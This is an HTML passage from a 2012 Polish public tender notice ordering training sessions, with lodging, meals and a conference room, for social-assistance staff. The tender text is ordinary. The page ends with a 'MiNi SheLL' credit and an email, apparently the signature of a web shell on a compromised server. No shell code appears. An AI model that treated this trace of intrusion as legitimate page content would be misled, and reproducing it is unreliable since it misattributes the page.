Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany  w kwalifikowalności wydatków,  zasada równości w projektach (GP6).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IX - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany w kwalifikowalności wydatków,  zasada równości w projektach (GP6)
Termin realizacji szkolenia: 2-3.04.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany   w kwalifikowalności wydatków,  zasada równości w projektach (GP6).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część X - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany w kwalifikowalności wydatków,  zasada równości w projektach (GP6)
Termin realizacji szkolenia: 4-5.04.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część XI - Współpraca instytucji  pomocy i integracji społecznej z PUP w ramach upowszechniania aktywnej integracji (GP7).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część XI - Współpraca instytucji  pomocy i integracji społecznej z PUP w ramach upowszechniania aktywnej integracji (GP7)
Termin realizacji szkolenia: 17-18.04.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com